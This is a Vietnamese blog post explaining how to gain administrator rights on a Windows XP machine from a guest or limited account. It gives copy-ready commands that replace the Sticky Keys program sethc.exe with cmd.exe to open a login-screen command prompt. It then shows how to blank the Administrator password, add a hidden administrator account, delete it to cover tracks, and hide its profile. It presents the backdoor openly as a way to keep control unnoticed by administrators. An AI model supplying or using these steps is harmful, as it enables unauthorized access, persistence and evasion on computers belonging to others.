Trao đổi với tôi

http://www.buidao.com

11/15/09

[Hacking] Hack Password Administrators

Trong Windows XP có 1 chương trình gọi là StickyKey, khi chúng ta nhấn phím Shift 5 lần thì chương trình này sẽ hiện ra:




File thực thi của chương trình này là C:\windows\system32\sethc.exe
Chúng ta sẽ Hack Pass Admin từ lỗ hổng của chương trình này.
Khi sử dụng 1 máy tính nào đó mà chỉ có quyền của Guest hoặc Limited User,chúng ta cần cài đặt một ứng dụng nhưng ứng dụng này đòi hỏi quyền Admin mới có thể cài đặt.
Hack Pass Admin nha
Thực hiện theo các bước sau:

Bước 1:
Vào Runcmd
gõ vào các dòng lệnh sau: (khuyến khích nên gõ cho quen lệnh)

cd %systemroot%/system32
rename sethc.exe sethc.exe.bak (đổi tên sethc.exe thành sethc.bak)
copy cmd.exe sethc.exe /y (thay thế file sethc.exe bằng file cmd.exe)

(hoặc mở Notepad, paste đoạn mã trên vào và lưu lại với tên là crack.cmd Sau đó Double-Clik lên file crack.cmd để thực thi.)

Bước 2:

Log off user đang dùng (Guest hoặc Limited user),từ cửa sổ chờ Login vào Windows, nhấp phím Shift 5 lần, nếu chương trình Command Prompt được gọi thay vì StickyKey thì bạn đã thành công!



Chương trình StickyKey đã được thay bằng hộp thoại Command Line


Ở cửa số Command Prompt này chúng ta sẽ có toàn quyền biến đổi tùy ý các Users có trên máy!

Bước 3:
Một số lệnh Command:

Xem những user nào hiện có trên máy (kể cả các user ần)


Xóa trắng password của Administrator(hay tương tự với bất kì user nào)cái này thì ko nên tí nào! dễ lộ lắm!

net user Administrator

cái này thì ko nên tí nào! dễ lộ lắm!hehe..
Thêm tài khoản ICT với password là uitstudent vào hệ thống

net user ICT uitstudent /add

Gán tài khoản ICT vào nhóm Quản Trị :

net localgroup Administrators ICT /add

Sau khi thực hiện các lệnh trên thì ICT đã là một thành viên của Administrators,có thể đăng nhập vào hệ thống mà không cần khởi động lại máy!
Sau khi dùng xong tài khoản mới tạo thì xóa đi để giấu dấu vết.

net user ICT /delete

Ẩn profile ứng với tài khoản ICT(xóa thì lâu lắm)

attrib +s +h +r C:\Documents and Settings\ICT

Với những Admin chuyên nghiệp thì sẽ biết có sự tồn tại của Profile mới tạo nhưng cmd.exe đã đổi tên thành sethc.exe vẫn còn trong System32, thì chúng ta vẫn còn nắm quyền kiểm soát!Hehehe

Link: http://uitstudent.com/hack-security/5986-hack-password-administrators.html